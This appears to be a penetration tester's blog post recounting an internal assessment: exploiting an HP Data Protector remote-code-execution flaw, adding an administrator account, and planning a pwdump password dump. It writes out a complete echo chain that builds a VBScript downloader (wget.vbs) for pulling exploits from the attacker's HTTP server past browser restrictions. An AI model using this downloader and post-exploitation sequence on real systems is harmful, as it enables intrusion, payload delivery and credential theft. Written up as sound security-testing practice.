Wget For Windows
Pentesting in , different environments, brings in various challenges. I would like to share my experience with a recent internal network assessment, the challenges I faced and how I was able to get over.So as usual the pentest started with scanning the various networks. Apart from a few Cisco default credentials, there was nothing more in the environment that could give me something juicy. Finally one of my scans revealed that a few of the systems was vulnerable to the HP Data Protector Remote Code execution. Thank you Lord!!! I quickly fired up metasploit and used a meterpreter payload and NOTHING!!.. Not to worry.
If you don’t have it create it
I downloaded the python exploit from exploit-db and boom RCE.
Next I checked the privileges this service was running with. Administrator ☺
Made user on the system and added the user to the administrators group and the Remote Desktop Users group.
Now that I was in the box I wanted to dump the passwords using pwdump.exe , but for some reason copy and paste wasn’t working. Now there are two ways to go about this problem and both involve using our attacking machine as a server.
I always use “python –m SimpleHTTPServer 80” to serve my exploits. So I opened the browser to connect to my attacking machine. The browser wouldn’t connect to my machine.
Now a linux box comes with various command line browsers/tools like curl, wget, fetch, scp. Someone famous once said “ If you don’t have it create it”. Create our own wget on windows.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET", strURL, False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs
Now that your have your own wget you can get over the restrictions put on the browser to download all the exploits you want. ☺
Happy Hacking ☺